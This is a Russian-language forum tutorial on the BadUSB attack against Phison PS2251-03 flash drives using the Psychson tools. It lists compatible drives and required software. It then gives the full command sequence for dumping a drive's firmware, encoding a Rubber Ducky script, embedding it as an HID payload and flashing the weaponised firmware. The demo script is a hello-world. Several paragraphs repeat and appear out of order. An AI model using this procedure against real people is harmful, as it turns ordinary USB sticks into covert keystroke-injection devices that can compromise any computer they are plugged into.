Флэш-накопители в которых установлен поддерживаемый контроллер. Но учтите что иногда в одну и ту же модель производитель может установить разные контроллеры:
**Пользователь
Необходимое ПО:
*SDCC обязательно ставить в папку "C:\Program Files\SDCC" !!!
Для реализации уязвимости я использовал флешку Silicon Power Marvel M60 на контроллере PS-2251-03-Q:
Список основан на откликах пользователей, которые обнаружили в приведенных ниже моделях флэш-накопителей поддерживаемый контроллер (PS2251-03 (2303)):- Patriot 8GB Supersonic Xpress*
- Kingston DataTraveler 3.0 T111 8GB
- Silicon power marvel M60 64GB
- Patriot Stellar 64 Gb Phison
- Toshiba TransMemory-MX USB 3.0 16GB
- Toshiba TransMemory-MX USB 3.0 8GB
- Kingston DataTraveler G4 64 GB
- Patriot PSF16GXPUSB Supersonic Xpress 16GB
- Silicon Power 32GB Blaze B30 (SP032GBUF3B30V1K)**
- Kingston Digital 8GB USB 3.0 DataTraveler (DT100G3/8GB)* - Using PS2251-03 (Программа DriveCom.exe не работает для этой флэшки, вам понадобится Phison MPALL Tools для прошивки.)
**Пользователь
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
сообщил что во флешке Silicon Power 32GB Blaze B30 иногда устанавливают чип Phison PS2306который не поддерживается на данный момент
Пользователи сообщили что на приведенных ниже флэш-накопителях с контроллером PS2251-03 (2303) не получилось загрузиться с прошивкой 1.03.53:- SanDisk Ultra 16Gb USB 3.0 SDCZ48-016G
Не поддерживаемые устройства:- Все устройства на контроллерах Phison использующие USB 2.0
- Kingston Digital 8GB USB 3.0 DataTraveler (DT100G3/8GB) - PS2251-07
Необходимое ПО:
- Visual Studio 2012 Express (для компиляции инструментов. Не обязательно) - Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
- SDCC (Small Device C Compiler) (для создания прошивок и патчей. Обязательно)* - Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
- Java Runtime Environment 7 (для запуска Duckencoder.jar) - Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
- Duckencoder.jar (для компиляции скриптов Rubberry Ducky) - Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
*SDCC обязательно ставить в папку "C:\Program Files\SDCC" !!!
- Кастомные прошивки и программы прошивальщики - Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
- Оригинальные утилиты (вроде MPALL) а также образы и прошивки - Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
- Образы и прошивки для PS2251-03 (прямая ссылка) - Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
- Утилита для извлечения информации о флэшке (Flash Drive Information Extractor) - Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
В этом архиве содержаться скомпилированные файлы программ-прошивальщиков и уже пропатченные прошивки (об этом файле я говорил в видео): Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Все команды ниже будут действовать в случае если будут установлены все программы (кроме visual studio) о которых я говорил в ролике и давал на них ссылки на форуме
Если вы разместили папку fw из архива не в корне диска C: а где-то в другом месте, то измените пути в командах!
Если у вас будут другие файлы BN (BN03V114M.BIN) то замените удалите содержимое папки C:\fw\fw_bn и загрузите туда ваши файлы при этом изменив их имена в командах.
Переводим флешку в boot-режим:
Отправляем на флешку burner-image:
Извлекаем и сохраняем текущую прошивку с флешки:
Создаю HID Payload:
Внедряю HID Payload в прошивку:
Зашиваю прошивку с внедренным HID Payload:
Если вы разместили папку fw из архива не в корне диска C: а где-то в другом месте, то измените пути в командах!
Если у вас будут другие файлы BN (BN03V114M.BIN) то замените удалите содержимое папки C:\fw\fw_bn и загрузите туда ваши файлы при этом изменив их имена в командах.
Переводим флешку в boot-режим:
Код:
C:\fw\Psychson-master\tools\DriveCom.exe /drive=F /action=SetBootMode
Код:
C:\fw\Psychson-master\tools\DriveCom.exe /drive=F /action=SendExecutable /burner=C:\fw\fw_bn\BN03V114M.BIN
Код:
C:\fw\Psychson-master\tools\DriveCom.exe /drive=F /action=DumpFirmware /firmware=C:\fw\currentfw.bin
Код:
java -jar C:\fw\ducky\duckencode.jar -i C:\fw\ducky\hello_world.txt -o C:\fw\ducky\inject.bin
Код:
C:\fw\Psychson-master\tools\EmbedPayload.exe C:\fw\ducky\inject.bin C:\fw\Psychson-master\firmware\bin\fw.bin
Код:
C:\fw\Psychson-master\tools\DriveCom.exe /drive=F /action=SendFirmware /burner=C:\fw\fw_bn\BN03V114M.BIN /firmware=C:\fw\Psychson-master\firmware\bin\fw.binДалее идет описание каждой папки (элемента) из репозитория на GitHub (см. ссылку выше).
Phison 2251-03 (2303) Создание собственной (кастомной) прошивки & Изменение существующих прошивок (патчинг)
Заметьте – кастомные и патченные прошивки тестировались только на контроллере PS2251-03 версии 1.03.53 (подходящей только для 8K eD3 NAND флэш-памяти). Прошивки могут работать также и на других контроллерах и с другой NAND флэш-памятью, но будьте осторожны!
Если вы используете соответствующую прошивку для вашего контроллера и NAND-памяти то понижение прошивки не нанесет никакого вреда (например, понижение с 1.10.53).
Предупреждение: Это экспериментальное программное обеспечение. Использование на не поддерживаемых устройствах или даже на поддерживаемых, может привести к потере информации, или повреждению самого устройства. Используйте на свой страх и риск.
*8051 - это встроенный в контроллер 8-и битный микропроцессор
Phison 2251-03 (2303) Создание собственной (кастомной) прошивки & Изменение существующих прошивок (патчинг)
Репозиторий содержит следующие элементы (папки):- DriveCom – PC C# приложение для связи с дисками на контроллере Phison.
- EmbedPayload – PC C# приложение для внедрения скриптов Rubber Ducky inject.bin в кастомную прошивку для дальнейшего выполнения.
- Injector – PC C# приложение как для извлечения кода прошивки так и для добавления/изменения кода существующей прошивки.
- Firmware – Прошивка для 8051* написанная на C.
- Patch – Коллекция патчей для 8051* написанных на C.
Релиз содержит следующие элементы (папки):- Patch – Коллекция патчей для 8051* написанных на C.
- Tools – Скомпилированные бинарные файлы всех приложений.
- CFW.bin – Кастомная прошивка содержащая встроенный HID payload (модуль на Rubbery Ducky).
Заметьте – кастомные и патченные прошивки тестировались только на контроллере PS2251-03 версии 1.03.53 (подходящей только для 8K eD3 NAND флэш-памяти). Прошивки могут работать также и на других контроллерах и с другой NAND флэш-памятью, но будьте осторожны!
Если вы используете соответствующую прошивку для вашего контроллера и NAND-памяти то понижение прошивки не нанесет никакого вреда (например, понижение с 1.10.53).
Предупреждение: Это экспериментальное программное обеспечение. Использование на не поддерживаемых устройствах или даже на поддерживаемых, может привести к потере информации, или повреждению самого устройства. Используйте на свой страх и риск.
*8051 - это встроенный в контроллер 8-и битный микропроцессор
Для реализации уязвимости я использовал флешку Silicon Power Marvel M60 на контроллере PS-2251-03-Q: